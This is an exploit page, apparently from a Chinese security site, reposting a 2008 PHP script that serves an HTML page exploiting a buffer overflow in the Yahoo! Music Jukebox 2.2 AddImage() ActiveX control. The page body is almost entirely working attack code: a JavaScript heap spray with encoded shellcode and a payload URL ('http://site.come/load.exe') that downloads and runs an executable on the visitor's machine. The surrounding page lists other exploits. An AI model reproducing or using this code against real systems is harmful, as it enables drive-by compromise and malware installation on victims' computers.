首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BOF Exploit
来源:h07@interia.pl 作者:Krystian 发布时间:2008-02-04  
<?php

// 0x48k-ymj by ...
// based on /5043
// Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>


function unescape($s){
$res=strtoupper(bin2hex($s));
$g = round(strlen($res)/4);
if ($g != (strlen($res)/4))$res.="00";
$out = "";
for ($i=0; $i<strlen($res);$i+=4)$out.="%u".substr($res, $i+2, 2).substr($res, $i, 2);
return $out;
}

echo '
<html>
<body>
<object id="obj" classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"></object>
<script language="JavaScript">

function gsc(){
var hsta = 0x0c0c0c0c;
var plc = unescape("%u4343%u4343"+
"%u0feb%u335b%u66c9%u80b9%u8001%uef33"+
"%ue243%uebfa%ue805%uffec%uffff%u8b7f"+
"%udf4e%uefef%u64ef%ue3af%u9f64%u42f3"+
"%u9f64%u6ee7%uef03%uefeb%u64ef%ub903"+
"%u6187%ue1a1%u0703%uef11%uefef%uaa66"+
"%ub9eb%u7787%u6511%u07e1%uef1f%uefef"+
"%uaa66%ub9e7%uca87%u105f%u072d%uef0d"+
"%uefef%uaa66%ub9e3%u0087%u0f21%u078f"+
"%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96"+
"%u0757%uef29%uefef%uaa66%uaffb%ud76f"+
"%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef"+
"%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba"+
"%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0"+
"%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c"+
"%u66bf%ucfaa%u1087%uefef%ubfef%uaa64"+
"%u85fb%ub6ed%uba64%u07f7%uef8e%uefef"+
"%uaaec%u28cf%ub3ef%uc191%u288a%uebaf"+
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85"+
"%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8"+
"%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf"+
"%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc"+
"%uefef%uef85%u9a10%u64cf%ue7aa%ued85"+
"%u64b6%uf7ba%uff07%uefef%u85ef%u6410"+
"%uffaa%uee85%u64b6%uf7ba%uef07%uefef"+
"%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec"+
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10"+
"%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+
"%u64d3%uf19b%uec97%ub91c%u9964%ueccf"+
"%udc1c%ua626%u42ae%u2cec%udcb9%ue019"+
"%uff51%u1dd5%ue79b%u212e%uece2%uaf1d"+
"%u1e04%u11d4%u9ab1%ub50a%u0464%ub564"+
"%ueccb%u8932%ue364%u64a4%uf3b5%u32ec"+
"%ueb64%uec64%ub12a%u2db2%uefe7%u1b07"+
"%u1011%uba10%ua3bd%ua0a2%uefa1"+
"'.unescape("http://site.come/load.exe").'");
var hbs=0x400000;
var pls=plc.length*2;
var sss=hbs-(pls+0x38);
var ss=unescape("%u0c0c%u0c0c");
ss=gss(ss,sss);
hbs=(hsta-0x400000)/hbs;
for(i=0;i<hbs;i++)m[i]=ss+plc;
}
function gss(ss,sss){
while(ss.length<sss*2)ss+=ss;
ss=ss.substring(0,sss);
return ss;
}
var m=new Array();
gsc();
try{
var tmp=gss(unescape("%u0c0c%u0c0c"),340);
obj.AddImage("http://"+tmp,1);
}catch(e){}
</script>
</body>
</html>
';

?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sejoong Namo ActiveSquare 6 Na
·Yahoo! Music Jukebox 2.2 AddIm
·IpSwitch WS_FTP Server with SS
·FaceBook PhotoUploader (ImageU
·A-Blog V.2 (id) XSS / Remote S
·Yahoo! Music Jukebox 2.2 AddIm
·Yahoo! Music Jukebox 2.2 AddBu
·BlogPHP v.2 (id) XSS / Remote
·Yahoo! JukeBox MediaGrid Activ
·Titan FTP Server 6.03 (USER/PA
·MicroTik RouterOS <= 3.2 SNMPd
·Total Video Player 1.03 M3U Fi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved